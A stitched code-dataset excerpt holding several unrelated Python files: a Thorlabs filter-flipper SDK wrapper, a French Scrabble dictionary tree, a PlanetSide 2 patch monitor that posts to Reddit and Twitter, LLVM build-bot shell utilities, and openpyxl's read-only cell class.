This is called automatically if Polling is enabled for the device using
:meth:`.start_polling`.
Raises
------
~msl.equipment.exceptions.ThorlabsError
If not successful.
"""
self.sdk.FF_RequestStatus(self._serial)
def get_status_bits(self):
"""Get the current status bits.
This returns the latest status bits received from the device. To get
new status bits, use :meth:`.request_status` or use the polling
function, :meth:`.start_polling`
Returns
-------
:class:`int`
The status bits from the device.
"""
return self.sdk.FF_GetStatusBits(self._serial)
def start_polling(self, milliseconds):
"""Starts the internal polling loop.
This function continuously requests position and status messages.
Parameters
----------
milliseconds : :class:`int`
The polling rate, in milliseconds.
Raises
------
~msl.equipment.exceptions.ThorlabsError
If not successful.
"""
self.sdk.FF_StartPolling(self._serial, int(milliseconds))
def polling_duration(self):
"""Gets the polling loop duration.
Returns
-------
:class:`int`
The time between polls in milliseconds or 0 if polling is not active.
"""
return self.sdk.FF_PollingDuration(self._serial)
def stop_polling(self):
"""Stops the internal polling loop."""
self.sdk.FF_StopPolling(self._serial)
def time_since_last_msg_received(self):
"""Gets the time, in milliseconds, since tha last message was received.
This can be used to determine whether communications with the device is
still good.
Returns
-------
:class:`int`
The time, in milliseconds, since the last message was received.
"""
ms = c_int64()
self.sdk.FF_TimeSinceLastMsgReceived(self._serial, byref(ms))
return ms.value
def enable_last_msg_timer(self, enable, msg_timeout=0):
"""Enables the last message monitoring timer.
This can be used to determine whether communications with the device is
still good.
Parameters
----------
enable : :class:`bool`
:data:`True` to enable monitoring otherwise :data:`False` to disable.
msg_timeout : :class:`int`, optional
The last message error timeout in ms. Set to 0 to disable.
"""
self.sdk.FF_EnableLastMsgTimer(self._serial, enable, msg_timeout)
def has_last_msg_timer_overrun(self):
"""Queries if the time since the last message has exceeded the
``lastMsgTimeout`` set by :meth:`.enable_last_msg_timer`.
This can be used to determine whether communications with the device is
still good.
Returns
-------
:class:`bool`
:data:`True` if last message timer has elapsed or
:data:`False` if monitoring is not enabled or if time of last message
received is less than ``msg_timeout``.
"""
return self.sdk.FF_HasLastMsgTimerOverrun(self._serial)
def request_settings(self):
"""Requests that all settings are downloaded from the device.
This function requests that the device upload all it's settings to the
DLL.
Raises
------
~msl.equipment.exceptions.ThorlabsError
If not successful.
"""
self.sdk.FF_RequestSettings(self._serial)
def clear_message_queue(self):
"""Clears the device message queue."""
self.sdk.FF_ClearMessageQueue(self._serial)
def register_message_callback(self, callback):
"""Registers a callback on the message queue.
Parameters
----------
callback : :class:`~msl.equipment.resources.thorlabs.kinesis.callbacks.MotionControlCallback`
A function to be called whenever messages are received.
"""
self.sdk.FF_RegisterMessageCallback(self._serial, callback)
def message_queue_size(self):
"""Gets the size of the message queue.
Returns
-------
:class:`int`
The number of messages in the queue.
"""
return self.sdk.FF_MessageQueueSize(self._serial)
def get_next_message(self):
"""Get the next Message Queue item. See :mod:`.messages`.
Returns
-------
:class:`int`
The message type.
:class:`int`
The message ID.
:class:`int`
The message data.
Raises
------
~msl.equipment.exceptions.ThorlabsError
If not successful.
"""
message_type = WORD()
message_id = WORD()
message_data = DWORD()
self.sdk.FF_GetNextMessage(self._serial, byref(message_type), byref(message_id), byref(message_data))
return message_type.value, message_id.value, message_data.value
def wait_for_message(self):
"""Wait for next Message Queue item. See :mod:`.messages`.
Returns
-------
:class:`int`
The message type.
:class:`int`
The message ID.
:class:`int`
The message data.
Raises
------
~msl.equipment.exceptions.ThorlabsError
If not successful.
"""
message_type = WORD()
message_id = WORD()
message_data = DWORD()
self.sdk.FF_WaitForMessage(self._serial, byref(message_type), byref(message_id), byref(message_data))
return message_type.value, message_id.value, message_data.value
if __name__ == '__main__':
from msl.equipment.resources.thorlabs.kinesis import _print
_print(FilterFlipper, FilterFlipper_FCNS, 'Thorlabs.MotionControl.FilterFlipper.h')
| mit | -1,277,002,313,023,637,200 | 31.574597 | 111 | 0.594355 | false |
Tailszefox/scrabblesolve | binaire.py | 1 | 6312 | #!/usr/bin/python
# -*- coding: utf-8 -*-
import os.path
import sys
# Nœud de l'arbre contenant une lettre
class Noeud(object):
"""
Constructeur
lettre : lettre stockée dans le nœud
mot : True si le chemin représente un mot du dictionnaire, False sinon
fd : lettre située au même niveau et après dans l'ordre alphabétique
fm : lettre située au niveau suivant
"""
def __init__(self, lettre = None, motComplet = None):
self._lettre = None
self._mot = False
self._motComplet = None
self._fd = None
self._fm = None
self.lettre = lettre
self.motComplet = motComplet
#Getters et setters
def setLettre(self, lettre):
self._lettre = lettre
def getLettre(self):
return self._lettre
def setFd(self, fd):
self._fd = fd
def getFd(self):
return self._fd
def setFm(self, fm):
self._fm = fm
def getFm(self):
return self._fm
def setMot(self, mot):
self._mot = mot
def getMot(self):
return self._mot
def setMotComplet(self, motComplet):
self._motComplet = motComplet
def getMotComplet(self):
return self._motComplet
lettre = property(getLettre, setLettre)
estMot = property(getMot, setMot)
motComplet = property(getMotComplet, setMotComplet)
fd = property(getFd, setFd)
fm = property(getFm, setFm)
#Arbre binaire
class Arbre(object):
"""
Constructeur
racine : nœud racine de l'arbre
fichier : fichier du dictionnaire
hash : tableau de hashage correspondant aux nœuds
"""
def __init__(self, fichier = None):
self._racine = None
self._fichier = None
self._hash = None
self.charger(fichier)
#Getters et setters
def getFichier(self):
return self._fichier
def setFichier(self, fichier):
self._fichier = fichier
def getRacine(self):
return self._racine
def setRacine(self, racine):
self._racine = racine
def setHash(self, h):
self._hash = h
def getHash(self):
return self._hash
fichier = property(getFichier, setFichier)
racine = property(getRacine, setRacine)
hash = property(getHash, setHash)
""" Chargement d'un fichier de dictionnaire """
def charger(self, fichier):
if not os.path.exists(fichier):
sys.exit('Le dictionnaire ' + fichier + ' n\'existe pas.')
self.hash = {}
self.fichier = fichier
self.racine = self.chargerMots()
def chargerMots(self):
racine = None
#Pour chaque mot du dictionnaire
for mot in open(self.fichier):
#Suppression du \n
mot = mot[:-1]
noeud = None
i = 1
#On cherche le préfixe du mot le plus grand existant déjà dans la table de hashage
motDecoupe = mot[0:-i]
while(motDecoupe and not noeud):
try:
noeud = self.hash[motDecoupe]
except:
#Le préfixe n'existe pas, on enlève une lettre au préfixe et on réessaye
i += 1
motDecoupe = mot[0:-i]
#Aucun préfixe n'existe, on ajoute le mot en entier
if(not motDecoupe):
racine = self.inserer(racine, mot, "")
#On a trouvé un préfixe, on démarre l'ajout à partir du noeud du préfixe, en ajoutant la partie du mot qui n'existe pas encore
else:
noeud.fm = self.inserer(noeud.fm, mot[-i:], motDecoupe)
return racine
"""
Insertion d'un nœud
noeud : noeud à partir duquel démarrer l'ajout
mot : mot à ajouter (si 'noeud' n'est pas la racine, il ne s'agit pas d'un mot entier)
chemin : chaine représentant le chemin parcouru pour arriver à 'noeud' (vide si noeud est la racine)
"""
def inserer(self, noeud, mot, chemin):
#Le noeud n'existe pas, on le crée et on l'ajoute dans la table de hashage
if noeud is None:
chemin += mot[0]
noeud = Noeud(mot[0], chemin)
self.hash[chemin] = noeud
#On est sur le noeud correspondant à la lettre actuelle
if (mot[0] == noeud.lettre):
#On a ajouté le mot en entier, estMot devient vrai
if (len(mot) == 1):
noeud.estMot = True
#On ajoute la suite du mot
else:
noeud.fm = self.inserer(noeud.fm, mot[1:], chemin)
#On n'est pas sur le noeud correspondant à la lettre actuelle, on continue l'insertion à droite
else:
noeud.fd = self.inserer(noeud.fd, mot, chemin)
return noeud
""" Recherche d'un mot dans l'arbre """
def rechercher(self, mot, noeuds = None):
estMot = False
suivants = []
#Si aucun noeud de départ n'est précisé, on démarre de la racine
if(not noeuds):
noeuds = [self.racine]
#Pour chacun des noeuds à partir desquels lancer la recherche
for noeud in noeuds:
estMotActuel, suivant = self.rechercherMot(noeud, mot)
#Si on trouve au moins un mot, estMot devient le nœud actuel comportant le mot complet
if(estMotActuel is not False):
estMot = estMotActuel
#On complète la liste des noeuds à partir desquels continuer la recherche (avec mot comme préfixe)
suivants += suivant
return estMot, suivants
def rechercherMot(self, noeudA, mot):
estMotM = False
estMotD = False
suivantM = []
suivantD = []
#Si le noeud existe
if(noeudA):
lettre = noeudA.lettre
estMot = noeudA.estMot
fmA = noeudA.fm
fdA = noeudA.fd
#Si le noeud correspond à la lettre actuelle (ou qu'il s'agit d'un joker)
if (mot[0] == '.' or mot[0] == lettre):
#On a trouvé le noeud correspond au mot
if(len(mot) == 1):
#Ce noeud à un fils, on le garde pour démarrer la recherche dessus plus tard
if(fmA):
suivantM.append(fmA)
#Le chemin parcouru correspond à un mot du dictionnaire
if(estMot):
estMotM = noeudA
#On continue la recherche du mot avec la lettre suivante si on n'est pas à la fin
else:
if(fmA):
estMotM, suivantM = self.rechercherMot(fmA, mot[1:])
#Si le noeud ne correspond pas à la lettre actuelle (ou qu'il s'agit d'un joker), on continue la recherche à droite
if (mot[0] == '.' or mot[0] > lettre):
if(fdA):
estMotD, suivantD = self.rechercherMot(fdA, mot)
#On fusionne les deux listes de noeuds (utile uniquement quand mot[0] est un joker)
suivant = suivantM + suivantD
#Si on a trouvé un mot à droite ou au milieu (ou les deux), on récupère le noeud correspondant à ce mot
if(estMotM):
estMot = estMotM
elif(estMotD):
estMot = estMotD
else:
estMot = False
return estMot, suivant
| cc0-1.0 | 6,933,392,178,072,535,000 | 23.625984 | 129 | 0.667306 | false |
plasticantifork/PS2Updates | PS2Updates.py | 1 | 11589 | #!/usr/bin/python
import sys, os
import traceback
import requests
import hashlib
import tweepy
import praw, oauthPS2Bot
from lxml import etree
from datetime import datetime,timedelta
def sizeof_fmt(num, suffix='B'):
for unit in ['','Ki','Mi','Gi','Ti','Pi','Ei','Zi']:
if abs(num) < 1024.0:
return '%3.1f %s%s' % (num, unit, suffix)
num /= 1024.0
return '%.1f %s%s' % (num, 'Yi', suffix)
def Monitor():
with open(os.path.join(sys.path[0], 'siteList.txt'), 'r') as f:
for line in f:
timeZone = datetime.utcnow() - timedelta(hours=7)
updateTime = timeZone.strftime('%Y-%m-%d %I:%M %p') + ' PST'
Message = line.split(',')[0]
hashTags = line.split(',')[2]
url = line.split(',')[1]
urlCommon = line.split(',')[3]
urlCommon = urlCommon.rstrip()
fileName = 'tstamps/%s' % Message
fileNameCommon = 'tstamps/C-%s' % Message
try:
tstampFileCommon = open(os.path.join(sys.path[0], fileNameCommon), 'r')
except:
resp = requests.head(urlCommon)
websiteTstampCommon = resp.headers['Last-Modified']
tstampFileCommon = open(os.path.join(sys.path[0], fileNameCommon), 'w')
tstampFileCommon.write(websiteTstampCommon)
tstampFileCommon.close()
print 'Creating common tstamp file: %s' % Message
try:
tstampFile = open(os.path.join(sys.path[0], fileName), 'r')
except:
resp = requests.head(url)
websiteTstamp = resp.headers['Last-Modified']
tstampFile = open(os.path.join(sys.path[0], fileName), 'w')
tstampFile.write(websiteTstamp)
tstampFile.close()
print 'Creating tstamp file: %s' % Message
else:
resp = requests.head(url)
websiteTstamp = resp.headers['Last-Modified']
tstampFile = open(os.path.join(sys.path[0], fileName), 'r')
oldWebsiteTstamp = tstampFile.readline().strip()
tstampFile.close()
tstampFile = open(os.path.join(sys.path[0], fileName), 'w')
tstampFile.write(websiteTstamp)
tstampFile.close()
#oldWebsiteTstamp = 'sdfsdf'
resp = requests.head(urlCommon)
websiteTstampCommon = resp.headers['Last-Modified']
tstampFileCommon = open(os.path.join(sys.path[0], fileNameCommon), 'r')
oldWebsiteTstampCommon = tstampFileCommon.readline().strip()
tstampFileCommon.close()
tstampFileCommon = open(os.path.join(sys.path[0], fileNameCommon), 'w')
tstampFileCommon.write(websiteTstampCommon)
tstampFileCommon.close()
#oldWebsiteTstampCommon = 'sdfsdf'
if(websiteTstamp != oldWebsiteTstamp) or (websiteTstampCommon != oldWebsiteTstampCommon):
patchSize = 0
redditFileNames = []
if ('Upcoming' not in Message) and ('PS2' in Message):
if (url == 'http://manifest.patch.daybreakgames.com/patch/sha/manifest/planetside2/planetside2-live/live/planetside2-live.sha.soe.txt'):
newUrl = url
lastUrl = 'http://manifest.patch.daybreakgames.com/patch/sha/manifest/planetside2/planetside2-live/livelast/planetside2-live.sha.soe.txt'
newCommonUrl = 'http://manifest.patch.daybreakgames.com/patch/sha/manifest/planetside2/planetside2-livecommon/live/planetside2-livecommon.sha.soe.txt'
lastCommonUrl = 'http://manifest.patch.daybreakgames.com/patch/sha/manifest/planetside2/planetside2-livecommon/livelast/planetside2-livecommon.sha.soe.txt'
elif (url == 'http://manifest.patch.daybreakgames.com/patch/sha/manifest/planetside2/planetside2-test/live/planetside2-test.sha.soe.txt'):
newUrl = url
lastUrl = 'http://manifest.patch.daybreakgames.com/patch/sha/manifest/planetside2/planetside2-test/livelast/planetside2-test.sha.soe.txt'
newCommonUrl = 'http://manifest.patch.daybreakgames.com/patch/sha/manifest/planetside2/planetside2-testcommon/live/planetside2-testcommon.sha.soe.txt'
lastCommonUrl = 'http://manifest.patch.daybreakgames.com/patch/sha/manifest/planetside2/planetside2-testcommon/livelast/planetside2-testcommon.sha.soe.txt'
if(websiteTstamp != oldWebsiteTstamp):
newRoot = etree.parse(newUrl)
lastRoot = etree.parse(lastUrl)
for newFile in newRoot.iter('file'):
if (newFile.get('delete') != 'yes'):
lastFile = lastRoot.xpath(newRoot.getpath(newFile))
if isinstance(lastFile, list):
lastFile = lastFile[0]
if (newFile.get('timestamp')!=lastFile.get('timestamp')):
if (lastFile is None) or (not len(newFile)):
if (isinstance(newFile.get('compressedSize'), str)):
patchSize+=int(newFile.get('compressedSize'))
redditFileNames.append(newFile.get('name'))
else:
patchFound = False
for patch in newFile.iter():
if (not patchFound) and (patch.get('sourceTimestamp')==lastFile.get('timestamp')):
patchSize+=int(patch.get('patchCompressedSize'))
redditFileNames.append(newFile.get('name'))
patchFound = True
if not patchFound:
if (isinstance(newFile.get('compressedSize'), str)):
patchSize+=int(newFile.get('compressedSize'))
redditFileNames.append(newFile.get('name'))
if (websiteTstampCommon != oldWebsiteTstampCommon):
newRoot = etree.parse(newCommonUrl)
lastRoot = etree.parse(lastCommonUrl)
for newFile in newRoot.iter('file'):
if (newFile.get('delete') != 'yes'):
lastFile = lastRoot.xpath(newRoot.getpath(newFile))
if isinstance(lastFile, list):
lastFile = lastFile[0]
if (newFile.get('timestamp')!=lastFile.get('timestamp')):
if (lastFile is None) or (not len(newFile)):
if (isinstance(newFile.get('compressedSize'), str)):
patchSize+=int(newFile.get('compressedSize'))
redditFileNames.append(newFile.get('name'))
else:
patchFound = False
for patch in newFile.iter():
if (not patchFound) and (patch.get('sourceTimestamp')==lastFile.get('timestamp')):
patchSize+=int(patch.get('patchCompressedSize'))
redditFileNames.append(newFile.get('name'))
patchFound = True
if not patchFound:
if (isinstance(newFile.get('compressedSize'), str)):
patchSize+=int(newFile.get('compressedSize'))
redditFileNames.append(newFile.get('name'))
if ('Upcoming' not in Message) and ('PS2' in Message):
r = oauthPS2Bot.login()
redditMessage = ' '.join(Message.replace('@Planetside2', '').split())
redditPost = u'\u25B2 %s update detected at %s' % (redditMessage, updateTime)
print '%s|Posting to Reddit (%s)' % (updateTime, Message)
redditFileNames.sort()
counter = 0
firstAsset = ''
if any('.pack' in a for a in redditFileNames):
for n in redditFileNames[:]:
if (n.endswith('.pack')):
if (not firstAsset):
firstAsset = n
redditFileNames.remove(n)
counter += 1
assetCount = counter-1
if (counter > 1):
redditFileNames.append('%s (and %s more)' % (firstAsset, assetCount))
elif (counter == 1):
redditFileNames.append(firstAsset)
redditFileNames.sort()
redditBody = '##**Files Changed**\n\n* %s\n\n**Size:** %s (%s bytes)\n\n*via [@PS2Updates](https://twitter.com/ps2updates) ([source code](https://github.com/plasticantifork/PS2Updates))*' % ('\n* '.join(redditFileNames), sizeof_fmt(patchSize), '{0:,}'.format(patchSize))
r.submit('planetside', redditPost, text=redditBody)
if 'Upcoming' in Message:
twitterPost = u'\u27F3 %s update detected at %s %s' % (Message, updateTime, hashTags)
else:
twitterPost = u'\u25B2 %s update detected at %s %s' % (Message, updateTime, hashTags)
print '%s|Posting to Twitter (%s)' % (updateTime, Message)
twitterAuthFile = open(os.path.join(sys.path[0], 'twitterAuth'), 'r')
consumerKey = twitterAuthFile.readline().strip()
consumerSecret = twitterAuthFile.readline().strip()
accessToken = twitterAuthFile.readline().strip()
accessTokenSecret = twitterAuthFile.readline().strip()
twitterAuthFile.close()
auth = tweepy.OAuthHandler(consumerKey, consumerSecret)
auth.set_access_token(accessToken, accessTokenSecret)
api = tweepy.API(auth)
api.update_status(status=twitterPost)
try:
Monitor()
except requests.exceptions.HTTPError:
print 'HTTPError Occurred'
except requests.exceptions.ConnectionError:
print 'ConnectionError Occurred'
except Exception:
traceback.print_exc()
quit()
| mit | 4,373,061,998,730,321,400 | 64.106742 | 294 | 0.48641 | false |
llvm/llvm-zorg | zorg/buildbot/builders/annotated/util.py | 1 | 3453 | from __future__ import print_function
import errno
import os
import re
import shutil
import subprocess
import sys
def clean_dir(path):
"""
Removes directory at path (and all its subdirectories) if it exists,
and creates an empty directory in its place.
"""
try:
rmtree(path)
except OSError as e:
if e.errno != errno.ENOENT:
raise
mkdirp(path)
def cmake_pjoin(*args):
"""
Join paths like safe_pjoin, but replace backslashes with forward
slashes on platforms where they are path separators. This prevents
CMake from choking when trying to decode what it thinks are escape
sequences in filenames.
"""
result = safe_pjoin(*args)
if os.sep == '\\':
return result.replace('\\', '/')
else:
return result
def report(msg):
sys.stderr.write(msg + '\n')
sys.stderr.flush()
def report_run_cmd(cmd, shell=False, *args, **kwargs):
"""
Print a command, then executes it using subprocess.check_call.
"""
report('Running: %s' % ((cmd if shell else shquote_cmd(cmd)),))
sys.stderr.flush()
subprocess.check_call(cmd, shell=shell, *args, **kwargs)
def mkdirp(path):
"""Create directory path if it does not already exist."""
try:
os.makedirs(path)
except OSError as e:
if e.errno != errno.EEXIST:
raise
def rmtree(path):
"""
Remove directory path and all its subdirectories. This differs from
shutil.rmtree() in that it tries to adjust permissions so that deletion
will succeed.
"""
# Some files will not be deletable, so we set permissions that allow
# deletion before we try deleting files.
for root, dirs, files in os.walk(path):
os.chmod(root, 0o755)
for f in files:
p = os.path.join(root, f)
os.chmod(p, 0o644)
os.unlink(p)
# At this point, we should have a tree of deletable directories.
shutil.rmtree(path)
def safe_pjoin(dirname, *args):
"""
Join path components with os.path.join, skipping the first component
if it is None.
"""
if dirname is None:
return os.path.join(*args)
else:
return os.path.join(dirname, *args)
def _shquote_impl(txt, escaped_chars, quoted_chars):
quoted = re.sub(escaped_chars, r'\\\1', txt)
if len(quoted) == len(txt) and not quoted_chars.search(txt):
return txt
else:
return '"' + quoted + '"'
_SHQUOTE_POSIX_ESCAPEDCHARS = re.compile(r'(["`$\\])')
_SHQUOTE_POSIX_QUOTEDCHARS = re.compile('[|&;<>()\' \t\n]')
def shquote_posix(txt):
"""Return txt, appropriately quoted for POSIX shells."""
return _shquote_impl(
txt, _SHQUOTE_POSIX_ESCAPEDCHARS, _SHQUOTE_POSIX_QUOTEDCHARS)
_SHQUOTE_WINDOWS_ESCAPEDCHARS = re.compile(r'(["\\])')
_SHQUOTE_WINDOWS_QUOTEDCHARS = re.compile('[ \t\n]')
def shquote_windows(txt):
"""Return txt, appropriately quoted for Windows's cmd.exe."""
return _shquote_impl(
txt.replace('%', '%%'),
_SHQUOTE_WINDOWS_ESCAPEDCHARS, _SHQUOTE_WINDOWS_QUOTEDCHARS)
def shquote(txt):
"""Return txt, appropriately quoted for use in a shell command."""
if os.name in set(('nt', 'os2', 'ce')):
return shquote_windows(txt)
else:
return shquote_posix(txt)
def shquote_cmd(cmd):
"""Convert a list of shell arguments to an appropriately quoted string."""
return ' '.join(map(shquote, cmd))
| apache-2.0 | -2,361,367,775,517,901,300 | 25.767442 | 78 | 0.631045 | false |
manuvarkey/cmbautomiser | cmbautomiser/openpyxl/cell/read_only.py | 1 | 3984 | from __future__ import absolute_import
# Copyright (c) 2010-2018 openpyxl
import re
from openpyxl.compat import unicode, long
from openpyxl.cell import Cell
from openpyxl.utils import get_column_letter
from openpyxl.utils.datetime import from_excel
from openpyxl.styles import is_date_format
from openpyxl.styles.numbers import BUILTIN_FORMATS
FLOAT_REGEX = re.compile(r"\.|[E-e]")
def _cast_number(value):
"Convert numbers as string to an int or float"
m = FLOAT_REGEX.search(value)
if m is not None:
return float(value)
return long(value)
class ReadOnlyCell(object):
__slots__ = ('parent', 'row', 'column', '_value', 'data_type', '_style_id')
def __init__(self, sheet, row, column, value, data_type='n', style_id=0):
self.parent = sheet
self._value = None
self.row = row
self.column = column
self.data_type = data_type
self.value = value
self._style_id = style_id
def __eq__(self, other):
for a in self.__slots__:
if getattr(self, a) != getattr(other, a):
return
return True
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return "<ReadOnlyCell {0!r}.{1}>".format(self.parent.title, self.coordinate)
@property
def shared_strings(self):
return self.parent.shared_strings
@property
def base_date(self):
return self.parent.base_date
@property
def coordinate(self):
column = get_column_letter(self.column)
return "{1}{0}".format(self.row, column)
@property
def style_array(self):
return self.parent.parent._cell_styles[self._style_id]
@property
def number_format(self):
_id = self.style_array.numFmtId
if _id < 164:
return BUILTIN_FORMATS.get(_id, "General")
else:
return self.parent.parent._number_formats[_id - 164]
@property
def font(self):
_id = self.style_array.fontId
return self.parent.parent._fonts[_id]
@property
def fill(self):
_id = self.style_array.fillId
return self.parent.parent._fills[_id]
@property
def border(self):
_id = self.style_array.borderId
return self.parent.parent._borders[_id]
@property
def alignment(self):
_id = self.style_array.alignmentId
return self.parent.parent._alignments[_id]
@property
def protection(self):
_id = self.style_array.protectionId
return self.parent.parent._protections[_id]
@property
def is_date(self):
return self.data_type == 'n' and is_date_format(self.number_format)
@property
def internal_value(self):
return self._value
@property
def value(self):
if self._value is None:
return
if self.data_type == 'n':
if self.style_array:
if is_date_format(self.number_format):
return from_excel(self._value, self.base_date)
return self._value
if self.data_type == 'b':
return self._value == '1'
elif self.data_type in(Cell.TYPE_INLINE, Cell.TYPE_FORMULA_CACHE_STRING):
return unicode(self._value)
elif self.data_type == 's':
return unicode(self.shared_strings[int(self._value)])
return self._value
@value.setter
def value(self, value):
if self._value is not None:
raise AttributeError("Cell is read only")
if value is None:
self.data_type = 'n'
elif self.data_type == 'n':
value = _cast_number(value)
self._value = value
class EmptyCell(object):
__slots__ = ()
value = None
is_date = False
font = None
border = None
fill = None
number_format = None
alignment = None
data_type = 'n'
def __repr__(self):
return "<EmptyCell>"
EMPTY_CELL = EmptyCell()
| gpl-3.0 | 7,798,107,740,639,183,000 | 24.703226 | 84 | 0.591616 | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.